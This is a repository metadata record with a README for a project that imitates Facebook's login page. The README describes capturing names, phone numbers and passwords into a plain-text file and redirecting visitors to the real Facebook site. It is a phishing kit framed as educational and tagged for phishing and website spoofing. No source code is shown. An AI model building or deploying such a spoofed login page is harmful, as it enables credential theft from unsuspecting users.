{"id":25835768,"url":"https://github.com/cipherx-bit/facebook_clone_project","last_synced_at":"2025-09-02T10:33:00.975Z","repository":{"id":271877541,"uuid":"914847119","full_name":"CipherX-bit/facebook_clone_project","owner":"CipherX-bit","description":"Facebook Clone Project a simple educational project that mimics Facebook's login interface. Built with HTML, CSS, PHP, and Python, it demonstrates form handling, server-side scripting, and data storage. This project saves user information to a text file and redirects users to the official Facebook website after submission.","archived":false,"fork":false,"pushed_at":"2025-01-10T12:46:34.000Z","size":45,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-02T16:18:47.877Z","etag":null,"topics":["cybersecurity","ethical-hacking-tools","facebook-clone","frontend","nodejs","penetration-testing","phishing-page","social-engineering","web-development","website-spoofing"],"latest_commit_sha":null,"homepage":"","language":"CSS","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CipherX-bit.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-01-10T12:35:07.000Z","updated_at":"2025-01-11T11:39:06.000Z","dependencies_parsed_at":null,"dependency_job_id":"da684c38-9b2e-4ba8-9cd2-ed7083dc0c64","html_url":"https://github.com/CipherX-bit/facebook_clone_project","commit_stats":null,"previous_names":["yassinedouadi/facebook_clone_project","cipherx-bit/facebook_clone_project"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CipherX-bit%2Ffacebook_clone_project","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CipherX-bit%2Ffacebook_clone_project/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CipherX-bit%2Ffacebook_clone_project/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CipherX-bit%2Ffacebook_clone_project/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CipherX-bit","download_url":"https://codeload.github.com/CipherX-bit/facebook_clone_project/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241304308,"owners_count":19941100,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","ethical-hacking-tools","facebook-clone","frontend","nodejs","penetration-testing","phishing-page","social-engineering","web-development","website-spoofing"],"created_at":"2025-03-01T01:34:03.838Z","updated_at":"2025-03-01T01:34:04.616Z","avatar_url":"https://github.com/CipherX-bit.png","language":"CSS","readme":"\n# Facebook Clone Project\n\nThis project is a simple clone of Facebook's login interface, designed for educational purposes. It allows users to enter their information, which is processed using a combination of PHP and Python. The information is saved to a text file, and the user is redirected to the official Facebook website upon successful form submission.\n\n## Features\n\n- HTML and CSS for the user interface\n- PHP for server-side processing\n- Python for saving data to a file\n- Simple form validation\n\n## Project Structure\n\n```\nfacebook_clone_project/\n├── index.php          # Main interface file\n├── process.php        # Handles form submission\n├── save_info.py       # Python script to save information\n├── server.py          # Script to monitor and display saved information\n├── info/\n│   └── info.txt       # File where user data is saved\n├── assets/\n│   ├── style.css      # CSS file for styling\n│   └── script.js      # JavaScript file for form validation\n```\n## Screenshot\n\nHere is a screenshot of the project in action:\n\n![Screenshot](Screenshot.png)\n\n## Prerequisites\n\n1. PHP installed on the server.\n2. Python (version 3.x) installed on the server.\n3. Write permissions for the `info` directory.\n4. A web server (e.g., Apache or Nginx) to serve the project files.\n\n## Installation\n\n1. Clone or download the project.\n2. Ensure that the `info` directory exists and has write permissions:\n   ```bash\n   mkdir -p info\n   chmod -R 777 info\n   ```\n3. Place the project files in the server's web directory.\n4. Start the web server and access the project through your browser.\n\n## Usage\n\n1. Open `index.php` in your browser.\n2. Fill out the form with your name, phone number, and password information.\n3. Submit the form.\n4. Upon successful submission:\n   - Your information will be saved in `info/info.txt`.\n   - You will be redirected to the official Facebook website.\n\n## Notes\n\n- This project is for demonstration purposes only. Do not use it in production environments.\n- Passwords are stored in plain text, which is not secure. Consider using encryption for real-world applications.\n\n## Debugging\n\n1. If the `info.txt` file is not created or updated, check the following:\n   - Ensure Python is installed and configured correctly.\n   - Verify the `info` directory has write permissions.\n   - Check the PHP script for errors using server logs.\n\n2. Test the Python script manually:\n   ```bash\n   python3 save_info.py \"Test Name\" \"1234567890\" \"oldpass\" \"newpass\"\n   ```\n\n## License\n\nThis project is licensed under the MIT License. Feel free to use and modify it for educational purposes.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcipherx-bit%2Ffacebook_clone_project","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcipherx-bit%2Ffacebook_clone_project","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcipherx-bit%2Ffacebook_clone_project/lists"}